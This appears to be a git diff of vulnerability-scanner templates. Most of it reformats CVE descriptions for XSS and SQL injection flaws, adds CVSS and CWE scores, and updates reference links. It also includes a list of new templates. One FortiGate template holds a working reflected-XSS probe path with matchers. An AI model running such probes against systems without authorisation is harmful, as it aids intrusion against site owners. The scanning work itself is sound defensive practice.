a/cves/2017/CVE-2017-14186.yaml b/cves/2017/CVE-2017-14186.yaml index 801101d0e5..aa2d0536b5 100644 --- a/cves/2017/CVE-2017-14186.yaml +++ b/cves/2017/CVE-2017-14186.yaml @@ -1,5 +1,5 @@ -id: CVE-2017-14186 - +id: CVE-2017-14186 + info: name: FortiGate SSL VPN Web Portal - Cross Site Scripting author: johnk3r @@ -10,7 +10,7 @@ info: - https://www.fortiguard.com/psirt/FG-IR-17-242 - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 - https://fortiguard.com/advisory/FG-IR-17-242 - - http://www.securitytracker.com/id/1039891 + - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 @@ -20,23 +20,23 @@ info: shodan-query: port:10443 http.favicon.hash:945408572 verified: "true" tags: cve,cve2017,fortigate,xss,fortinet -requests: - - method: GET - path: - - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 +requests: + - method: GET + path: + - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml index a78f44813e..4007207dee 100644 --- a/cves/2017/CVE-2017-8917.yaml +++ b/cves/2017/CVE-2017-8917.yaml @@ -9,7 +9,7 @@ info: reference: - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - https://nvd.nist.gov/vuln/detail/CVE-2017-8917 - - http://www.securitytracker.com/id/1038522 + - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/cves/2022/CVE-2022-1916.yaml b/cves/2022/CVE-2022-1916.yaml index f194e6a531..2f98314a2d 100644 --- a/cves/2022/CVE-2022-1916.yaml +++ b/cves/2022/CVE-2022-1916.yaml @@ -1,11 +1,11 @@ id: CVE-2022-1916 info: - name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting + name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting author: Akincibor severity: medium description: | - The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting. + WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808 - https://nvd.nist.gov/vuln/detail/CVE-2022-1916 @@ -44,3 +44,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-1933.yaml b/cves/2022/CVE-2022-1933.yaml index d1e2bb36b6..377b69c9d1 100644 --- a/cves/2022/CVE-2022-1933.yaml +++ b/cves/2022/CVE-2022-1933.yaml @@ -1,11 +1,11 @@ id: CVE-2022-1933 info: - name: CDI < 5.1.9 - Cross Site Scripting + name: WordPress CDI <5.1.9 - Cross Site Scripting author: Akincibor severity: medium description: | - The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting. + WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf - https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/ @@ -41,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-22242.yaml b/cves/2022/CVE-2022-22242.yaml index 91ce741c36..c88e8381b9 100644 --- a/cves/2022/CVE-2022-22242.yaml +++ b/cves/2022/CVE-2022-22242.yaml @@ -5,12 +5,12 @@ info: author: EvergreenCartoons severity: medium description: | - A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web + Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. reference: - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-22242 - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US - https://kb.juniper.net/JSA69899 + - https://nvd.nist.gov/vuln/detail/CVE-2022-22242 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -43,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-26263.yaml b/cves/2022/CVE-2022-26263.yaml index f64e5c0f26..fcdbda3638 100644 --- a/cves/2022/CVE-2022-26263.yaml +++ b/cves/2022/CVE-2022-26263.yaml @@ -1,16 +1,19 @@ id: CVE-2022-26263 info: - name: Yonyou u8 v13.0 - Cross Site Scripting + name: Yonyou U8 13.0 - Cross-Site Scripting author: edoardottt,theamanrawat severity: medium description: | - Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp. + Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md - https://nvd.nist.gov/vuln/detail/CVE-2022-26263 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 cve-id: CVE-2022-26263 + cwe-id: CWE-80 metadata: verified: true google-dork: inurl:/u8sl/WebHelp @@ -29,3 +32,5 @@ headless: - 'alert(document.domain)")' condition: and + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-3506.yaml b/cves/2022/CVE-2022-3506.yaml index 558d3ad7f9..be43c1c809 100644 --- a/cves/2022/CVE-2022-3506.yaml +++ b/cves/2022/CVE-2022-3506.yaml @@ -1,15 +1,16 @@ id: CVE-2022-3506 info: - name: WordPress Related Posts <= 2.1.2 - Cross-Site Scripting + name: WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting author: arafatansari severity: medium description: | - The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability. + WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/ - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828 - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3506 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 @@ -62,3 +63,5 @@ requests: regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' internal: true + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index fb65fa2963..e45ba3bf0c 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -1,11 +1,11 @@ id: CVE-2022-3578 info: - name: ProfileGrid < 5.1.1 - Cross-Site Scripting + name: WordPress ProfileGrid <5.1.1 - Cross-Site Scripting author: theamanrawat severity: medium description: | - The ProfileGrid WordPress plugin before 5.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ @@ -42,3 +42,5 @@ requests: - 'contains(body_2, "Extension Options")' - 'contains(body_2, "&tab")' condition: and + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-40359.yaml b/cves/2022/CVE-2022-40359.yaml index 1aa259a1f4..57167dc921 100644 --- a/cves/2022/CVE-2022-40359.yaml +++ b/cves/2022/CVE-2022-40359.yaml @@ -1,15 +1,15 @@ id: CVE-2022-40359 info: - name: kfm <= 1.4.7 - Reflected Cross-Site Scripting + name: Kae's File Manager <=1.4.7 - Cross-Site Scripting author: edoardottt,daffainfo severity: medium description: | - Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php. + Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks reference: - https://cxsecurity.com/issue/WLB-2022090057 - - https://nvd.nist.gov/vuln/detail/CVE-2022-40359 - https://code.google.com/archive/p/kfm/downloads + - https://nvd.nist.gov/vuln/detail/CVE-2022-40359 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -43,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-40879.yaml b/cves/2022/CVE-2022-40879.yaml index 259e338bed..13bd42c2a8 100644 --- a/cves/2022/CVE-2022-40879.yaml +++ b/cves/2022/CVE-2022-40879.yaml @@ -5,7 +5,7 @@ info: author: arafatansari severity: medium description: | - kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the parameter 'errorMsg.' + kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/kekingcn/kkFileView/issues/389 - https://nvd.nist.gov/vuln/detail/CVE-2022-40879 @@ -41,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-42746.yaml b/cves/2022/CVE-2022-42746.yaml index c52edb12b4..adadc0de09 100644 --- a/cves/2022/CVE-2022-42746.yaml +++ b/cves/2022/CVE-2022-42746.yaml @@ -1,16 +1,19 @@ id: CVE-2022-42746 info: - name: CandidATS v3.0.0 - Cross Site Scripting. + name: CandidATS 3.0.0 - Cross-Site Scripting. author: arafatansari - severity: Medium + severity: medium description: | - CandidATS v3.0.0 on 'indexFile' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://fluidattacks.com/advisories/modestep/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42746 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 cve-id: CVE-2022-42746 + cwe-id: CWE-80 metadata: verified: true shodan-query: http.html:"CandidATS" @@ -38,3 +41,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-42747.yaml b/cves/2022/CVE-2022-42747.yaml index 972d4dcc82..767e94ed5a 100644 --- a/cves/2022/CVE-2022-42747.yaml +++ b/cves/2022/CVE-2022-42747.yaml @@ -1,16 +1,16 @@ id: CVE-2022-42747 info: - name: CandidATS v3.0.0 - Cross Site Scripting. + name: CandidATS 3.0.0 - Cross-Site Scripting. author: arafatansari severity: medium description: | - CandidATS v3.0.0 on 'sortBy' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://fluidattacks.com/advisories/modestep/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-42747 - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-42747 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -43,3 +43,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-42748.yaml b/cves/2022/CVE-2022-42748.yaml index e09874e375..adcfac438a 100644 --- a/cves/2022/CVE-2022-42748.yaml +++ b/cves/2022/CVE-2022-42748.yaml @@ -1,16 +1,16 @@ id: CVE-2022-42748 info: - name: CandidATS v3.0.0 - Cross Site Scripting. + name: CandidATS 3.0.0 - Cross-Site Scripting. author: arafatansari severity: medium description: | - CandidATS v3.0.0 on 'sortDirection' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://fluidattacks.com/advisories/modestep/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-42748 - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-42748 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -43,3 +43,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-42749.yaml b/cves/2022/CVE-2022-42749.yaml index 987542e974..37d5666fc2 100644 --- a/cves/2022/CVE-2022-42749.yaml +++ b/cves/2022/CVE-2022-42749.yaml @@ -1,16 +1,16 @@ id: CVE-2022-42749 info: - name: CandidATS v3.0.0 - Cross Site Scripting. + name: CandidATS 3.0.0 - Cross-Site Scripting author: arafatansari severity: medium description: | - CandidATS v3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://fluidattacks.com/advisories/modestep/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-42749 - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-42749 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -44,3 +44,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml index 8c6fad11b5..896193e035 100644 --- a/cves/2022/CVE-2022-43014.yaml +++ b/cves/2022/CVE-2022-43014.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43014 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43014 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43015.yaml b/cves/2022/CVE-2022-43015.yaml index 27b9c7efb6..ba07736c00 100644 --- a/cves/2022/CVE-2022-43015.yaml +++ b/cves/2022/CVE-2022-43015.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43015 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43015 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43016.yaml b/cves/2022/CVE-2022-43016.yaml index 3bd1bfbfde..79f6773f15 100644 --- a/cves/2022/CVE-2022-43016.yaml +++ b/cves/2022/CVE-2022-43016.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43016 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback component. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_callback.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43016 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43017.yaml b/cves/2022/CVE-2022-43017.yaml index 842c3e8bd8..4088db0a0b 100644 --- a/cves/2022/CVE-2022-43017.yaml +++ b/cves/2022/CVE-2022-43017.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43017 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43017 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43018.yaml b/cves/2022/CVE-2022-43018.yaml index 0eb0bcc1a4..de8bd46573 100644 --- a/cves/2022/CVE-2022-43018.yaml +++ b/cves/2022/CVE-2022-43018.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43018 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43018 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/miscellaneous/x-recruiting-header.yaml b/miscellaneous/x-recruiting-header.yaml index 286584c2d6..df3ab40f16 100644 --- a/miscellaneous/x-recruiting-header.yaml +++ b/miscellaneous/x-recruiting-header.yaml @@ -6,7 +6,7 @@ info: severity: info description: Websites that advertise jobs via HTTP headers reference: - - https://www.shodan.io/search?query=%22X-Recruiting%3A%22 + - https://webtechsurvey.com/response-header/x-recruiting metadata: verified: true shodan-query: "X-Recruiting:" diff --git a/misconfiguration/mysqld-exporter-metrics.yaml b/misconfiguration/mysqld-exporter-metrics.yaml index 5ceb1a3d80..74a987770d 100644 --- a/misconfiguration/mysqld-exporter-metrics.yaml +++ b/misconfiguration/mysqld-exporter-metrics.yaml @@ -1,9 +1,14 @@ id: mysqld-exporter-metrics info: - name: Detect MySQLd Exporter + name: MySQL Exporter Panel - Detect author: DhiyaneshDk severity: low + description: MYSQL Exporter panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"MySQLd exporter" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/vulnerabilities/other/aerocms-sqli.yaml b/vulnerabilities/other/aerocms-sqli.yaml index a0beb4e3c0..61daaf465d 100644 --- a/vulnerabilities/other/aerocms-sqli.yaml +++ b/vulnerabilities/other/aerocms-sqli.yaml @@ -1,14 +1,18 @@ id: aerocms-sqli info: - name: Aero CMS v0.0.1 - SQL Injection + name: AeroCMS 0.0.1 - SQL Injection author: shivampand3y severity: high description: | - The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks.The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes. + AeroCMS 0.0.1 contains a SQL injection vulnerability via the author parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://www.exploit-db.com/exploits/51022 - https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 metadata: verified: true tags: aero,cms,sqli,edb @@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/vulnerabilities/other/steve-xss.yaml b/vulnerabilities/other/steve-xss.yaml index 91cd1f7cd8..7df133c7fe 100644 --- a/vulnerabilities/other/steve-xss.yaml +++ b/vulnerabilities/other/steve-xss.yaml @@ -5,9 +5,13 @@ info: author: clem9669 severity: medium description: | - The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points. + SteVe contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/steve-community/steve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 metadata: verified: true shodan-query: http.title:"SteVe - Steckdosenverwaltung" @@ -36,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/vulnerabilities/other/wuzhicms-sqli.yaml b/vulnerabilities/other/wuzhicms-sqli.yaml index e9f5196811..8365c50777 100644 --- a/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/vulnerabilities/other/wuzhicms-sqli.yaml @@ -37,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/vulnerabilities/wordpress/wptouch-xss.yaml b/vulnerabilities/wordpress/wptouch-xss.yaml index b3abb2fe8f..0cbdcf8a7b 100644 --- a/vulnerabilities/wordpress/wptouch-xss.yaml +++ b/vulnerabilities/wordpress/wptouch-xss.yaml @@ -1,14 +1,18 @@ id: wptouch-xss info: - name: WPtouch < 4.3.44 - Cross Site Scripting + name: WordPress WPtouch <4.3.44 - Cross-Site Scripting author: akincibor severity: medium description: | - The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. + WordPress WPtouch plugin prior to 4.3.44 contains a cross-site scripting vulnerability. The plugin does not escape some URLs before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4 - https://wordpress.org/plugins/wptouch/advanced/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan requests: @@ -48,3 +52,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 From a5fade36dd712daf9875ed40bdf43db95044ae32 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 10:43:47 +0530 Subject: [PATCH 1279/1415] Update CVE-2022-4050.yaml --- cves/2022/CVE-2022-4050.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index a0ed1b9e47..f18f0c41f9 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -32,8 +32,8 @@ requests: matchers: - type: dsl dsl: - - 'duration>=6' + - 'duration>=3' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' - condition: and \ No newline at end of file + condition: and From 2a44b0c721e3b8646614e1df062f6d8bc8d71a99 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Dec 2022 05:32:46 +0000 Subject: [PATCH 1280/1415] Auto Generated New Template Addition List [Wed Dec 14 05:32:46 UTC 2022] :robot: --- .new-additions | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/.new-additions b/.new-additions index 1993cf76e1..29a7f3d958 100644 --- a/.new-additions +++ b/.new-additions @@ -1,16 +1,33 @@ cves/2019/CVE-2019-6802.yaml cves/2021/CVE-2021-20323.yaml cves/2021/CVE-2021-24827.yaml +cves/2021/CVE-2021-25099.yaml cves/2022/CVE-2022-0826.yaml cves/2022/CVE-2022-0948.yaml +cves/2022/CVE-2022-2314.yaml +cves/2022/CVE-2022-45917.yaml default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml +exposed-panels/gyra-master-admin.yaml +exposed-panels/ilias-panel.yaml exposed-panels/mag-dashboard-panel.yaml +exposed-panels/microfocus-admin-server.yaml exposed-panels/netris-dashboard-panel.yaml +exposed-panels/planet-estream-panel.yaml +exposed-panels/verizon-router-panel.yaml exposures/configs/config-json.yaml +exposures/configs/golangci-config.yaml +exposures/configs/stestr-config.yaml +exposures/files/database-credentials.yaml exposures/files/gradle-libs.yaml +exposures/files/kubernetes-etcd-keys.yaml exposures/files/routes-ini.yaml +exposures/files/svn-wc-db.yaml +exposures/logs/badarg-log.yaml +exposures/logs/firebase-debug-log.yaml +exposures/logs/npm-debug-log.yaml iot/homeworks-illumination.yaml +misconfiguration/installer/easyscripts-installer.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/finger-detect.yaml @@ -18,5 +35,8 @@ network/detection/redis-detect.yaml network/detection/rpcbind-portmapper-detect.yaml takeovers/leadpages-takeover.yaml technologies/apache/apache-karaf-panel.yaml +technologies/icecast-server-detect.yaml vulnerabilities/nps/nps-auth-bypass.yaml +vulnerabilities/qibocms-file-download.yaml +vulnerabilities/vmware/vmware-nsx-stream-rce.yaml vulnerabilities/zend/zend-v1-xss.yaml From e56fe0734de91be31f3bd08a9db963c1239c7853 Mon Sep 17 00:00:00 2001 From: sandeep 